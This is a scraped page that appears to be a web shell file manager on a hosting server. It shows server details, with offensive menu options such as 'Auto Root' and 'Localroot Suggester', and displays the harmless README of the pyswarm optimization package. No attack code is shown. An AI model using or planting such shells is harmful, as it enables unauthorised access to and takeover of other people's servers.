Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python27 /
share /
doc /
alt-python27-pyswarm /
Delete
Unzip
Name
Size
Permission
Date
Action
README.rst
1.32
KB
-rwxr-xr-x
2014-10-22 07:57
Save
Rename
========================================================= Particle swarm optimization (PSO) with constraint support ========================================================= The ``pyswarm`` package is a gradient-free, evolutionary optimization package for python that supports constraints. What's New ========== In this release, we've added Python3 compatibility. Requirements ============ - NumPy Installation and download ========================= See the `package homepage`_ for helpful hints relating to downloading and installing pyswarm. Source Code =========== The latest, bleeding-edge, but working, `code <https://github.com/tisimst/pyDOE/tree/master/pyswarm>`_ and `documentation source <https://github.com/tisimst/pyswarm/tree/master/doc/>`_ are available `on GitHub <https://github.com/tisimst/pyswarm/>`_. Contact ======= Any feedback, questions, bug reports, or success stores should be sent to the `author`_. I'd love to hear from you! License ======= This package is provided under two licenses: 1. The *BSD License* 2. Any other that the author approves (just ask!) References ========== - `Particle swarm optimization`_ on Wikipedia .. _author: mailto:tisimst@gmail.com .. _Particle swarm optimization: http://en.wikipedia.org/wiki/Particle_swarm_optimization .. _package homepage: http://pythonhosted.org/pyswarm